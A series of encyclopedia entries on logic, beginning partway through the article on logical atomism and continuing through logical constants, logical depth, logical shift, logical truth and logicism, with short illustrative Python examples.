Its principal exponent was the British philosopher Bertrand Russell . It is also widely held that the early works [ a ] of his Austrian-born pupil and colleague, Ludwig Wittgenstein , defend a version of logical atomism, though he went on to reject it in his later Philosophical Investigations . [ b ] Some philosophers in the Vienna Circle were also influenced by logical atomism (particularly Rudolf Carnap , who was deeply sympathetic to some of its philosophical aims, especially in his earlier works). [ 2 ] Gustav Bergmann also developed a form of logical atomism that focused on an ideal phenomenalistic language, particularly in his discussions of J.O. Urmson 's work on analysis. [ 3 ]
The name for this kind of theory was coined in March 1911 by Russell, in a work published in French titled "Le Réalisme analytique" (published in translation as "Analytic Realism" in Volume 6 of The Collected Papers of Bertrand Russell ). [ 4 ] Russell was developing and responding to what he called " logical holism "—i.e., the belief that the world operates in such a way that no part can be known without the whole being known first. [ 5 ] This belief is related to monism , and is associated with the absolute idealism which was dominant in Britain at the time. The criticism of monism seen in the works of Russell and his colleague G. E. Moore can therefore be seen as an extension of their criticism of absolute idealism, particularly as it appeared in the works of F. H. Bradley and J. M. E. McTaggart . [ 5 ] Logical atomism can thus be understood as a developed alternative to logical holism, or the "monistic logic" of the absolute idealists.
As mentioned above, the term "logical atomism" was first coined by Russell in 1911. However, since the paper in which it was first introduced was published only in French during Russell's lifetime, the view was not widely associated with Russell in the English-speaking world until Russell gave a series of lectures in early 1918 under the title "The Philosophy of Logical Atomism". These lectures were subsequently published in 1918 and 1919 in The Monist (Volumes 28 and 29), which at the time was edited by Philip Jourdain . [ 6 ] Russell's ideas as presented in 1918 were also influenced by Wittgenstein, as he explicitly acknowledges in his introductory note. This has partly contributed to the widely-held view that Wittgenstein was also a logical atomist, as has Wittgenstein's atomistic metaphysics developed in the Tractatus .
However, logical atomism has older roots. Russell and Moore broke free from British Idealism in the 1890s. And Russell's break developed along its own logical and mathematical path. His views on philosophy and its methods were heavily influenced by the revolutionary nineteenth-century mathematics of figures like Cantor , Dedekind , Peano , and Weierstrass . As he says in his 1901 essay, republished in his 1917 collection Mysticism and Logic, and Other Essays under the title "Mathematics and the Metaphysicians":
What is now required is to give the greatest possible development to mathematical logic, to allow to the full the importance of relations , and then to found upon this secure basis a new philosophical logic, which may hope to borrow some of the exactitude and certainty of its mathematical foundation. If this can be successfully accomplished, there is every reason to hope that the near future will be as great an epoch in pure philosophy as the immediate past has been in the principles of mathematics. Great triumphs inspire great hopes; and pure thought may achieve, within our generation, such results as will place our time, in this respect, on a level with the greatest age of Greece. (pg. 96) [ 7 ]
With the operations of the calculus of relations as atoms or indefinables ( primitive notions ), Russell described logicism , or mathematics as logic, in The Principles of Mathematics (1903). Russell thought the revolutionary mathematical work could, through the development of relations, produce a similar revolution in philosophy. This ambition overlays the character of Russell's work from 1900 onward. Russell believes in fact that logical atomism, fully carried out and implemented throughout philosophy, is the realization of his 1901 ambition. As he says in the 1911 piece where he coins the phrase "logical atomism":
The true method, in philosophy as in science, should be inductive, meticulous, respectful of detail, and should reject the belief that it is the duty of each philosopher to solve all problems by himself. It is this method which has inspired analytic realism [a.k.a. logical atomism], and it is the only method, if I am not mistaken, with which philosophy will succeed in obtaining results as solid as those obtained in science. (pg. 139) [ 4 ]
Logical atomism rightly makes logic central to philosophy. In doing so, it makes philosophy scientific, at least in Russell's view. As he says in his 1924 "Logical Atomism": [ 8 ]
The technical methods of mathematical logic, as developed in this book [ Principia Mathematica ], seem to me very powerful, and capable of providing a new instrument for the discussion of many problems that have hitherto remained subject to philosophical vagueness.
In summary, Russell thought that a moral of the revolutionary work in mathematics was this: equally revolutionary work in philosophy could occur, if we only make logic the essence of philosophizing. [ 9 ] This aspiration lies at the origin, and motivates and runs through, logical atomism.
Russell referred to his atomistic doctrine as contrary to the monistic logic "of the people who more or less follow Hegel" (PLA 178).
The first principle of logical atomism is that the world contains "facts". The facts are complex structures consisting of objects ("particulars"). A fact may be that an object has a property or that it stands in some relation to other objects. In addition, there are judgments ("beliefs"), which stand in a relationship to the facts, and by this relationship are either true or false.
According to this theory, even ordinary objects of daily life "are apparently complex entities". According to Russell, words like "this" and "that" are used to denote particulars. In contrast, ordinary names such as "Socrates" actually are definite descriptions. In the analysis of "Plato talks with his pupils", "Plato" needs to be replaced with something like "the man who was the teacher of Aristotle".
In 1905, Russell had already criticized Alexius Meinong , whose theories led to the paradox of the simultaneous existence and non-existence of fictional objects; the theory of descriptions Russell developed in response ("On Denoting", 1905) was crucial to logical atomism, as Russell believed that language mirrored reality.
Bertrand Russell's theory of logical atomism consists of three interworking parts: the atomic proposition, the atomic fact , and the atomic complex. An atomic proposition, also known as an elemental judgement, is a fundamental statement describing a single entity. Russell refers to this entity as an atomic fact, and recognizes a range of elements within each fact that he refers to as particulars and universals . A particular denotes a signifier such as a name, many of which may apply to a single atomic fact, while a universal lends quality to these particulars, e.g. color, shape, disposition. In Russell's Theory of Acquaintance , awareness and thereby knowledge of these particulars and universals comes through sense data . Every system consists of many atomic propositions and their corresponding atomic facts, known together as an atomic complex. In respect to the nomenclature that Russell used for his theory, these complexes are also known as molecular facts in that they possess multiple atoms. Rather than decoding the complex in a top-down manner, logical atomism analyzes its propositions individually before considering their collective effect. According to Russell, the atomic complex is a product of human thought and ideation that combines the various atomic facts in a logical manner.
Russell's perspective on belief proved a point of contention between him and Wittgenstein, causing it to shift throughout his career. In logical atomism, belief is a complex that possesses both true and untrue propositions. Initially, Russell plotted belief as the special relationship between a subject and a complex proposition. Later, he amended this to say that belief lacks a proposition, and instead associates with universals and particulars directly. Here, the link between psychological experience – sense data – and components of logical atomism – universals and particulars – causes a breach in the typical logic of the theory; Russell's logical atomism is in some respects defined by the crossover of metaphysics and analytical philosophy, which characterizes the field of naturalized epistemology . [ 10 ]
In his theory of Logical Atomism, Russell posited the highly controversial idea that for every positive fact there exists a parallel negative fact: a fact that is untrue. The correspondence theory maintains that every atomic proposition coordinates with exactly one atomic fact, and that all atomic facts exist. The Theory of Acquaintance says that for any given statement taking the form of an atomic proposition, we must be familiar with the assertion it makes. For example, in the positive statement, "the leaf is green," we must be acquainted with the atomic fact that the leaf is green, and we know that this statement corresponds to exactly this one fact. Along this same line, the complementary negative statement, "the leaf is not green," is clearly false given what we know about the color of the leaf, but our ability to form a statement of this nature means that a corresponding fact must exist. Regardless of whether the second statement is or isn't true, the connection between its proposition and a fact must itself be true. One central doctrine of Logical Atomism, known as the Logically Perfect Language Principle, enables this conclusion. This principle establishes that everything exists as atomic proposition and fact, and that all language signifies reality. In Russell's viewpoint, this necessitates the negative fact, whereas Wittgenstein maintained the more conventional Principle of Bivalence , in which the states "P" and "Not (P)" cannot coexist.
In his Tractatus Logico-Philosophicus , Ludwig Wittgenstein explains his version of logical atomism as the relationship between proposition, state of affairs, object, and complex, often referred to as "Picture theory". [ 11 ] Compared with Russell's version, the two accounts of the proposition are congruent in that both treat propositions as clear statements about an atomic entity. Every atomic proposition is constructed from "names" that correspond to "objects", and the interaction of these objects generates "states of affairs," which are analogous to what Russell called atomic facts. Where Russell identifies both particulars and universals, Wittgenstein amalgamates these into objects for the sake of protecting the truth-independence of his propositions; a self-contained state of affairs defines each proposition, and the truth of a proposition cannot be proven by the sharing or exclusion of objects between propositions. In Russell's work, his concept of universals and particulars denies truth-independence, as each universal accounts for a specific set of particulars, and the exact matching of any two sets implies equality, difference implies inequality, and this acts as a qualifier of truth. In Wittgenstein's theory, an atomic complex is a layered proposition subsuming many atomic propositions, each representing its own state of affairs.
Wittgenstein's handling of belief was dismissive and reflects his abstention from the epistemology that concerned Russell. Because his theory dealt with understanding the nature of reality, and because any item or process of the mind barring positive fact, i.e. something absolute and without interpretation, may become altered and thus divorced from reality, belief exists as a sign of reality but not reality itself. Wittgenstein was decidedly skeptical of epistemology , which tends to value unifying metaphysical ideas while depreciating the casewise and methodological inspection of philosophy that dominates his Tractatus Logico-Philosophicus. [ 12 ] Furthermore, Wittgenstein concerned himself with defining the exact correspondence between language and reality wherein any explanation of reality that defies or overburdens these semantic structures, namely metaphysics, becomes unhinged. Wittgenstein's work bears the exact philosophical determinants that he openly dismissed, hence his later abandonment of this theory altogether.
At the time Russell delivered his lectures on logical atomism, he had lost contact with Wittgenstein. After World War I , Russell met with Wittgenstein again and helped him publish the Tractatus Logico-Philosophicus , Wittgenstein's own version of Logical Atomism.
Although Wittgenstein did not use the expression Logical Atomism , the book espouses most of Russell's logical atomism except for Russell's Theory of Knowledge (T 5.4 and 5.5541). By 1918 Russell had moved away from this position. Nevertheless, the Tractatus differed so fundamentally from the philosophy of Russell that Wittgenstein always believed that Russell misunderstood the work. [ citation needed ]
The differences relate to many details, but the crucial difference is in a fundamentally different understanding of the task of philosophy. Wittgenstein believed that the task of philosophy was to clean up linguistic mistakes. Russell was ultimately concerned with establishing sound epistemological foundations. Epistemological questions such as how practical knowledge is possible did not interest Wittgenstein. Wittgenstein investigated the "limits of the world" and later on meaning. For Wittgenstein, metaphysics and ethics were nonsensical, as they did not "speak of facts", though he did not mean to devalue their importance in life by describing them in this way. [ 13 ] Russell, on the other hand, believed that these subjects, particularly ethics, though belonging neither to philosophy nor to science and possessing an inferior epistemological foundation, were not only of certain interest, but also meaningful.
The immediate effect of the Tractatus was enormous, particularly through the reception it received from the Vienna Circle . However, it is now claimed by many contemporary analytic philosophers that the Vienna Circle misunderstood certain sections of the Tractatus . The indirect effect of the method, however, was perhaps even greater long-term, especially on logical positivism . Wittgenstein eventually rejected the "atomism" of logical atomism in his posthumously published book, Philosophical Investigations , and it is still debated whether or not he ever held the wide-ranging version that Russell expounded in his 1918 logical atomism lectures. [ 1 ] Russell, on the other hand, never abandoned logical atomism. In his 1959 My Philosophical Development , Russell said that his philosophy evolved and changed many times in his life, but he described all these changes as an "evolution" stemming from his original "revolution" into logical atomism in 1899-1900: [ 14 ]
There is one major division in my philosophical work: in the years 1899-1900, I adopted the philosophy of logical atomism and the technique of Peano in mathematical logic. This was so great a revolution as to make my previous work, except such as was purely mathematical, irrelevant to everything that I did later. The change in these years was a revolution; subsequent changes have been of the nature of an evolution. (Chapter 1: "Introductory Outline")
Even into the 1960s, Russell claimed that he "rather avoided labels" in describing his views—with the exception of "logical atomism." [ 15 ]
Philosophers such as Willard Van Orman Quine , Hubert Dreyfus and Richard Rorty went on to adopt logical holism . | https://en.wikipedia.org/wiki/Logical_atomism |
In logic , a logical constant or constant symbol of a language L is a symbol that has the same semantic value under every interpretation of L . Two important types of logical constants are logical connectives and quantifiers . The equality predicate (usually written '=') is also treated as a logical constant in many systems of logic .
One of the fundamental questions in the philosophy of logic is "What is a logical constant?"; [ 1 ] that is, what special feature of certain constants makes them logical in nature? [ 2 ]
Some symbols that are commonly treated as logical constants are: T ("true"), F ("false"), ¬ ("not"), ∧ ("and"), ∨ ("or"), → ("implies"), ∀ ("for all"), and ∃ ("there exists").
Many of these logical constants are sometimes denoted by alternate symbols (for instance, the use of the symbol "&" rather than "∧" to denote the logical and ).
Defining logical constants is a major part of the work of Gottlob Frege and Bertrand Russell . Russell returned to the subject of logical constants in the preface to the second edition (1937) of The Principles of Mathematics , noting that logic becomes linguistic: "If we are to say anything definite about them, [they] must be treated as part of the language, not as part of what the language speaks about." [ 3 ] The text of this book takes relations R , their converses, and their complements as primitive notions , also treated as logical constants in the form aRb .
| https://en.wikipedia.org/wiki/Logical_constant |
In the system of Aristotelian logic , the logical cube is a diagram representing the different ways in which each of the eight propositions of the system is logically related ('opposed') to each of the others. [ 1 ] The system is also useful in the analysis of syllogistic logic , serving to identify the allowed logical conversions from one type to another. [ 2 ]
| https://en.wikipedia.org/wiki/Logical_cube |
Logical depth is a measure of complexity for individual strings devised by Charles H. Bennett based on the computational complexity of an algorithm that can recreate a given piece of information. It differs from Kolmogorov complexity in that it considers the computation time of the algorithm with nearly minimal length, rather than the length of the minimal algorithm.
Informally, the logical depth of a string x to a significance level s is the time required to compute x by a program no more than s bits longer than the shortest program that computes x . [ 1 ]
Formally, let p* be the shortest program that computes a string x on some universal computer U . Then the logical depth of x to the significance level s is given by min{ T ( p ) : (| p | − | p* | < s ) ∧ ( U ( p ) = x )}, where T ( p ) is the number of computation steps that p made on U to produce x and halt.
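Because the minimization ranges over all programs of a universal machine, logical depth is not computable in general; still, the shape of the definition can be shown on a toy candidate set. In the sketch below the "programs" are invented (length, running time, output) records, so only the minimization itself is faithful to the definition:

```python
# Toy illustration of logical depth. Real logical depth quantifies over
# all programs of a universal machine and is uncomputable; here the
# candidate "programs" are hand-made (length_bits, steps, output)
# records, invented purely for illustration.
def depth(x, candidates, s):
    """Minimum running time over programs within s bits of the shortest."""
    hits = [(l, t) for (l, t, out) in candidates if out == x]
    p_star = min(l for l, _ in hits)          # |p*|: length of the shortest program
    return min(t for l, t in hits if l - p_star < s)

candidates = [
    (100, 10**6, "x"),   # near-minimal program, but slow
    (104, 10**3, "x"),   # four bits longer, much faster
    (500, 500,   "x"),   # a verbose "print the literal" program
]

print(depth("x", candidates, s=1))   # 1000000: only the 100-bit program qualifies
print(depth("x", candidates, s=8))   # 1000: the 104-bit program now counts
```

Raising the significance level s trades description length for speed, which is exactly the trade-off the definition is designed to expose.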
| https://en.wikipedia.org/wiki/Logical_depth |
In philosophy , logical holism is the belief that the world operates in such a way that no part can be known without the whole being known first.
Theoretical holism, introduced by Pierre Duhem , is the view in the philosophy of science that a scientific theory can only be understood in its entirety. Different total theories of science are understood by making them commensurable, allowing statements in one theory to be converted to sentences in another. [ 1 ] : II Richard Rorty argued that when two theories are incompatible, a process of hermeneutics is necessary. [ 1 ] : II
Practical holism is a concept in the work of Martin Heidegger that posits it is not possible to produce a complete understanding of one's own experience of reality, because one's mode of existence is embedded in cultural practices and in the constraints of the task one is performing. [ 1 ] : III
Bertrand Russell concluded that " Hegel 's dialectical logical holism should be dismissed in favour of the new logic of propositional analysis " [ 2 ] and introduced a form of logical atomism . [ 3 ]
A unique kind of holism is found in Chinese philosophy , especially in the writings of the Tiantai school of Buddhism, beginning with the works of Zhiyi . The Buddhist studies scholar and philosopher Brook Ziporyn terms it "Omnicentric holism". [ 4 ]
| https://en.wikipedia.org/wiki/Logical_holism |
A logical machine or logical abacus is a tool containing a set of parts that uses energy to perform formal logic operations through the use of truth tables . Early logical machines were mechanical devices that performed basic operations in Boolean logic . The principal examples of such machines are those of William Stanley Jevons ( logic piano ), [ 1 ] [ 2 ] John Venn , [ 3 ] and Allan Marquand . [ 4 ] [ 5 ]
Contemporary logical machines are computer-based electronic programs that perform proof assistance with theorems in mathematical logic. In the 21st century, these proof assistant programs have given birth to a new field of study called mathematical knowledge management .
The earliest logical machines were mechanical constructs built in the late 19th century. William Stanley Jevons invented the first logical machine in 1869, the logic piano. [ 6 ] In 1883, Allan Marquand invented a new logical machine that performed the same operations as Jevons' logic piano but with improvements in design simplification, portability, and input-output controls. [ 7 ]
A logical abacus is constructed to show all the possible combinations of a set of logical terms with their negatives, and, further, the way in which these combinations are affected by the addition of attributes or other limiting words, i.e., to simplify mechanically the solution of logical problems. These instruments are all more or less elaborate developments of the "logical slate", on which were written in vertical columns all the combinations of symbols or letters which could be made logically out of a definite number of terms. These were compared with any given premises, and those which were incompatible were crossed off. In the abacus the combinations are inscribed each on a single slip of wood or similar substance, which is moved by a key; incompatible combinations can thus be mechanically removed at will, in accordance with any given series of premises.
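The crossing-off procedure is simple enough to emulate directly. The sketch below is our own encoding, not a model of any particular machine: it lists every combination of three terms and their negatives, writing negatives in lowercase in the style Jevons used, and strikes out the combinations incompatible with two sample premises.

```python
# A sketch of the "logical slate": enumerate all combinations of the
# terms A, B, C and their negatives, then remove those incompatible
# with the premises. Premises are encoded here as Python predicates;
# lowercase letters stand for negated terms.
from itertools import product

terms = ["A", "B", "C"]
rows = list(product([True, False], repeat=len(terms)))   # all 2^3 combinations

premises = [
    lambda A, B, C: (not A) or B,     # "All A are B"
    lambda A, B, C: not (B and C),    # "No B are C"
]

surviving = [row for row in rows if all(p(*row) for p in premises)]
for row in surviving:
    print("".join(t if v else t.lower() for t, v in zip(terms, row)))
# Prints ABc, aBc, abC, abc -- the combinations consistent with the premises.
```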
This article incorporates text from a publication now in the public domain : Chisholm, Hugh , ed. (1911). " Abacus ". Encyclopædia Britannica . Vol. 1 (11th ed.). Cambridge University Press. pp. 5– 6.
| https://en.wikipedia.org/wiki/Logical_machine |
In many philosophies of logic , statements are categorized into different logical qualities based on how they go about saying what they say. Doctrines of logical quality are an attempt to answer the question: "How many qualitatively different ways are there of saying something?" Aristotle answers: two; you can affirm something of something or deny something of something. Since Frege , the normal answer in the West is only one, assertion , but what is said, the content of the claim, can vary. For Frege, asserting the negation of a claim serves roughly the same role as denying a claim does in Aristotle. Other Western logicians such as Kant and Hegel answer: ultimately three; you can affirm, deny, or make merely limiting affirmations, which transcend both affirmation and denial. In Indian logic , four logical qualities have been the norm, and Nāgārjuna is sometimes interpreted as arguing for five.
In Aristotle 's term logic there are two logical qualities: affirmation (kataphasis) and denial (apophasis). The logical quality of a proposition is whether it is affirmative (the predicate is affirmed of the subject) or negative (the predicate is denied of the subject). Thus "every man is a mortal" is affirmative, since "mortal" is affirmed of "man". "No men are immortals" is negative, since "immortal" is denied of "man". [ 1 ]
Logical quality has become much less central to logical theory in the twentieth century. It has become common to use only one logical quality, typically called logical assertion . Much of the work previously done by distinguishing affirmation from denial is typically now done through the theory of negation . [ 2 ] Thus, to most contemporary logicians, making a denial is essentially reducible to affirming a negation. Denying that Socrates is ill is the same thing as affirming that it is not the case that Socrates is ill, which is basically affirming that Socrates is not ill. This trend may go back to Frege, although his notation for negation is ambiguous between asserting a negation and denying an assertion. [ 3 ] Gentzen 's notation definitely assimilates denial to assertion of negation, but might not quite have a single logical quality; see below.
Logicians in the western traditions have often expressed belief in some other logical quality besides affirmation and denial. Sextus Empiricus , in the 2nd or 3rd century CE, argued for the existence of "nonassertive" statements, which indicate suspension of judgment by refusing to affirm or deny anything. [ 4 ] Pseudo-Dionysius the Areopagite in the 6th century, argued for the existence of "non-privatives", which transcend both affirmation and denial. For example, it is not quite correct to affirm that God is, nor to deny that God moves, but rather one should say that God is beyond-motion, or super-motive, and this is intended not just as a special kind of affirmation or denial, but a third move besides affirmation and denial. [ 5 ]
For Kant, every judgment takes one of three possible logical qualities: affirmative, negative, or infinite. For Kant, if I say “The soul is mortal” I have made an affirmation about the soul; I have said something contentful about it. If I say “The soul is not mortal,” I have made a negative judgment and thus “warded off error” but I have not said what the soul is instead. If, however, I say “The soul is non-mortal,” I have made an infinite judgment. For the purposes of “General logic” it is sufficient to see infinite judgments as a sub-variety of affirmative judgments: I have said something of the soul, namely that it is not mortal. But from the standpoint of “ Transcendental Logic ” it is important to distinguish the infinite from the affirmative. Although I have taken something away from the possibilities of what the soul might be like, I have not thereby said what it is or clarified the concept of the soul; there are still an infinite number of possible ways the soul could be. The content of an infinite judgment is purely limitative of our knowledge rather than ampliative of it. [ 6 ] Hegel follows Kant in insisting that, at least transcendentally, affirmation and negation are not enough but require a third logical quality sublating them both. [ 7 ]
In Indian logic it has long been traditional to claim that there are four kinds of claims. You can affirm that X is so, you can deny that X is so, you can neither-affirm-nor-deny that X is so, or you can both-affirm-and-deny that X is so. Each claim can also take one of four truth-values: true, false, neither-true-nor-false, and both-true-and-false. However, the tradition is clear that the four kinds of statements are distinct from the four values of statements. [ 8 ] Nāgārjuna is sometimes interpreted as teaching that there is a fifth logical quality besides the four typical of Indian logic, but there are disputing interpretations. [ 9 ]
Although the distinction between affirmation and denial is rarely supported today, you might try to argue that some other distinctions in the structure of assertion could be thought of as differences of logical quality. One might argue, for instance, that the distinction between sequents with empty and non-empty antecedents amounts to a distinction between logical consequences and logical assertions . Alternately one might claim that both forms are really just logical assertions in the metalanguage , and are not statements at all in the object language, since the turnstile isn't in the object language. Similarly you might argue that a modern language that includes both an assertion mechanism, and a "retraction" mechanism (such as Diderik Batens ' "Adaptive Logics") [ 10 ] could be thought of as having two logical qualities "assertion" and "retraction." | https://en.wikipedia.org/wiki/Logical_quality |
In computer science , a logical shift is a bitwise operation that shifts all the bits of its operand. The two base variants are the logical left shift and the logical right shift . This is further modulated by the number of bit positions a given value shall be shifted, such as shift left by 1 or shift right by n . Unlike an arithmetic shift , a logical shift does not preserve a number's sign bit or distinguish a number's exponent from its significand (mantissa); every bit in the operand is simply moved a given number of bit positions, and the vacant bit-positions are filled, usually with zeros, and possibly ones (contrast with a circular shift ).
A logical shift is often used when its operand is being treated as a sequence of bits instead of as a number.
Logical shifts can be useful as efficient ways to perform multiplication or division of unsigned integers by powers of two. Shifting left by n bits on a signed or unsigned binary number has the effect of multiplying it by 2^n . Shifting right by n bits on an unsigned binary number has the effect of dividing it by 2^n (rounding towards 0).
Logical right shift differs from arithmetic right shift. Thus, many languages have different operators for them. For example, in Java and JavaScript , the logical right shift operator is >>> , but the arithmetic right shift operator is >> . (Java has only one left shift operator ( << ), because left shift via logic and arithmetic have the same effect.)
The programming languages C , C++ , and Go , however, have only one right shift operator, >> . Most C and C++ implementations, and Go, choose which right shift to perform depending on the type of integer being shifted: signed integers are shifted using the arithmetic shift, and unsigned integers are shifted using the logical shift. C++ also overloads the shift operators << and >> for stream input and output on its standard stream objects, "cin" and "cout".
All currently relevant C standards (ISO/IEC 9899:1999 to 2011) leave the result undefined when the shift count is greater than or equal to the bit width of the operand. This allows C compilers to emit efficient code for various platforms by permitting direct use of the native shift instructions, which differ in behavior. For example, shift-left-word in PowerPC chooses the more-intuitive behavior where shifting by the bit width or above gives zero, [ 6 ] whereas SHL in x86 masks the shift amount to the lower bits to reduce the maximum execution time of the instructions , and as such a shift by the bit width does not change the value. [ 7 ]
Some languages, such as the .NET Framework and LLVM , also leave shifting by the bit width and above unspecified (.NET) [ 8 ] or undefined (LLVM). [ 9 ] Others choose to specify the behavior of their most common target platforms, such as C# which specifies the x86 behavior. [ 10 ]
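Python, used here for illustration, has unbounded integers and only an arithmetic right shift, so a logical shift at a fixed width has to be simulated by masking; the helpers below are a common idiom rather than dedicated operators of the language:

```python
# Simulated 32-bit logical shifts in Python. Python's >> is arithmetic
# and its integers are unbounded, so the width must be imposed by masking.
def logical_shift_right(value, shift, width=32):
    """Shift a two's-complement `width`-bit value right, filling with zeros."""
    return (value & ((1 << width) - 1)) >> shift

def logical_shift_left(value, shift, width=32):
    """Shift left, discarding bits moved past `width`."""
    return (value << shift) & ((1 << width) - 1)

x = -8                              # ...1111 1000 as a 32-bit two's-complement value
print(x >> 1)                       # -4: arithmetic shift preserves the sign
print(logical_shift_right(x, 1))    # 2147483644: logical shift fills with 0
print(logical_shift_left(23, 1))    # 46 == 23 * 2
```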
If the bit sequence 0001 0111 (decimal 23) is logically shifted by one bit position, then: a logical shift left yields 0010 1110 (decimal 46), with the MSB discarded and a zero filling the vacated LSB position; a logical shift right yields 0000 1011 (decimal 11), with the LSB discarded and a zero filling the vacated MSB position.
Note: MSB = most significant bit, LSB = least significant bit. | https://en.wikipedia.org/wiki/Logical_shift |
Logical truth is one of the most fundamental concepts in logic . Broadly speaking, a logical truth is a statement which is true regardless of the truth or falsity of its constituent propositions . In other words, a logical truth is a statement which is not only true, but one which is true under all interpretations of its components (other than its logical constants ). Thus, logical truths such as "if p, then p" can be considered tautologies . Logical truths are thought to be the simplest case of statements which are analytically true (or in other words, true by definition). All of philosophical logic can be thought of as providing accounts of the nature of logical truth, as well as logical consequence . [ 1 ]
Logical truths are generally considered to be necessarily true . This is to say that they are such that no situation could arise in which they could fail to be true. The view that logical statements are necessarily true is sometimes treated as equivalent to saying that logical truths are true in all possible worlds . However, the question of which statements are necessarily true remains the subject of continued debate.
Treating logical truths, analytic truths, and necessary truths as equivalent, logical truths can be contrasted with facts (which can also be called contingent claims or synthetic claims ). Contingent truths are true in this world, but could have turned out otherwise (in other words, they are false in at least one possible world). Logically true propositions such as "If p and q, then p" and "All married people are married" are logical truths because they are true due to their internal structure and not because of any facts of the world (whereas "All married people are happy", even if it were true, could not be true solely in virtue of its logical structure).
Rationalist philosophers have suggested that the existence of logical truths cannot be explained by empiricism , because they hold that it is impossible to account for our knowledge of logical truths on empiricist grounds. Empiricists commonly respond to this objection by arguing that logical truths (which they usually deem to be mere tautologies), are analytic and thus do not purport to describe the world. The latter view was notably defended by the logical positivists in the early 20th century.
Logical truths, being analytic statements, do not contain any information about any matters of fact . Other than logical truths, there is also a second class of analytic statements, typified by "no bachelor is married". The characteristic of such a statement is that it can be turned into a logical truth by substituting synonyms for synonyms salva veritate . "No bachelor is married" can be turned into "no unmarried man is married" by substituting "unmarried man" for its synonym "bachelor". [ citation needed ]
In his essay Two Dogmas of Empiricism , the philosopher W. V. O. Quine called into question the distinction between analytic and synthetic statements. It was this second class of analytic statements that caused him to note that the concept of analyticity itself stands in need of clarification, because it seems to depend on the concept of synonymy , which stands in need of clarification. In his conclusion, Quine rejects that logical truths are necessary truths. Instead he posits that the truth-value of any statement can be changed, including logical truths, given a re-evaluation of the truth-values of every other statement in one's complete theory. [ citation needed ]
Considering different interpretations of the same statement leads to the notion of truth value . The simplest approach to truth values is that a statement may be "true" in one case but "false" in another. In one sense of the term tautology , it is any type of formula or proposition which turns out to be true under any possible interpretation of its terms (also called a valuation or assignment , depending upon the context). This is synonymous with logical truth. [ citation needed ]
However, the term tautology is also commonly used to refer to what could more specifically be called truth-functional tautologies. Whereas a tautology or logical truth is true solely because of the logical terms it contains in general (e.g. " every ", " some ", and "is"), a truth-functional tautology is true because of the logical terms it contains which are logical connectives (e.g. " or ", " and ", and " nor "). Not all logical truths are tautologies of such a kind. [ citation needed ]
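Truth-functional tautologies, unlike logical truths involving quantifiers, can be checked mechanically by exhausting the truth table. A minimal sketch (our own encoding, with formulas given as boolean functions of their atoms):

```python
# Brute-force tautology test: a truth-functional formula is a tautology
# iff it comes out true under all 2^n assignments to its atoms.
from itertools import product

def is_tautology(formula, n_atoms):
    return all(formula(*vals) for vals in product([True, False], repeat=n_atoms))

def implies(a, b):
    return (not a) or b

print(is_tautology(lambda p: implies(p, p), 1))            # True: "if p, then p"
print(is_tautology(lambda p, q: implies(p and q, p), 2))   # True: "if p and q, then p"
print(is_tautology(lambda p, q: implies(p or q, p), 2))    # False: not a logical truth
```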
Logical constants, including logical connectives and quantifiers , can all be reduced conceptually to logical truth. For instance, two or more statements are logically incompatible if, and only if, their conjunction is logically false. One statement logically implies another when it is logically incompatible with the negation of the other. A statement is logically true if, and only if, its opposite is logically false. The opposite statements must contradict one another. In this way all logical connectives can be expressed in terms of preserving logical truth. The logical form of a sentence is determined by its semantic or syntactic structure and by the placement of logical constants. Logical constants determine whether a statement is a logical truth when they are combined with a language that limits its meaning. Therefore, until it is determined how to make a distinction between all logical constants regardless of their language, it is impossible to know the complete truth of a statement or argument. [ 2 ]
The concept of logical truth is closely connected to the concept of a rule of inference . [ 3 ]
Logical positivism was a movement in the early 20th century that tried to reduce the reasoning processes of science to pure logic. Among other things, the logical positivists claimed that any proposition that is not empirically verifiable is neither true nor false, but nonsense . [ citation needed ]
Non-classical logic is the name given to formal systems which differ in a significant way from standard logical systems such as propositional and predicate logic . There are several ways in which this is done, including by way of extensions, deviations, and variations. The aim of these departures is to make it possible to construct different models of logical consequence and logical truth. [ 4 ] | https://en.wikipedia.org/wiki/Logical_truth |
In the philosophy of mathematics , logicism is a programme comprising one or more of the theses that – for some coherent meaning of ' logic ' – mathematics is an extension of logic, some or all of mathematics is reducible to logic, or some or all of mathematics may be modelled in logic. [ 1 ] Bertrand Russell and Alfred North Whitehead championed this programme, initiated by Gottlob Frege and subsequently developed by Richard Dedekind and Giuseppe Peano .
Dedekind's path to logicism had a turning point when he was able to construct a model satisfying the axioms characterizing the real numbers using certain sets of rational numbers . This and related ideas convinced him that arithmetic , algebra and analysis were reducible to the natural numbers plus a "logic" of classes. Furthermore by 1872 he had concluded that the naturals themselves were reducible to sets and mappings . It is likely that other logicists, most importantly Frege, were also guided by the new theories of the real numbers published in the year 1872.
The philosophical impetus behind Frege's logicist programme from the Grundlagen der Arithmetik onwards was in part his dissatisfaction with the epistemological and ontological commitments of then-extant accounts of the natural numbers, and his conviction that Kant 's use of truths about the natural numbers as examples of synthetic a priori truth was incorrect.
This started a period of expansion for logicism, with Dedekind and Frege as its main exponents. However, this initial phase of the logicist programme was brought into crisis with the discovery of the classical paradoxes of set theory ( Cantor's 1896, Zermelo and Russell's 1900–1901). Frege gave up on the project after Russell recognized and communicated his paradox identifying an inconsistency in Frege's system set out in the Grundgesetze der Arithmetik. Note that naive set theory also suffers from this difficulty.
On the other hand, Russell wrote The Principles of Mathematics in 1903 using the paradox and developments of Giuseppe Peano 's school of geometry . Since he treated the subject of primitive notions in geometry and set theory
as well as the calculus of relations , this text is a watershed in the development of logicism. Evidence of the assertion of logicism was collected by Russell and Whitehead in their Principia Mathematica . [ 2 ]
Today, the bulk of extant mathematics is believed to be derivable logically from a small number of extralogical axioms, such as the axioms of Zermelo–Fraenkel set theory (or its extension ZFC ), from which no inconsistencies have as yet been derived. Thus, elements of the logicist programmes have proved viable, but in the process theories of classes, sets and mappings, and higher-order logics other than with Henkin semantics have come to be regarded as extralogical in nature, in part under the influence of Quine 's later thought.
Kurt Gödel 's incompleteness theorems show that no formal system from which the Peano axioms for the natural numbers may be derived – such as Russell's systems in PM – can decide all the well-formed sentences of that system. [ 3 ] This result damaged David Hilbert 's programme for foundations of mathematics whereby 'infinitary' theories – such as that of PM – were to be proved consistent from finitary theories, with the aim that those uneasy about 'infinitary methods' could be reassured that their use should provably not result in the derivation of a contradiction . Gödel's result suggests that in order to maintain a logicist position, while still retaining as much as possible of classical mathematics, one must accept some axiom of infinity as part of logic. On the face of it, this damages the logicist programme also, albeit only for those already doubtful concerning 'infinitary methods'. Nonetheless, positions deriving from both logicism and from Hilbertian finitism have continued to be propounded since the publication of Gödel's result.
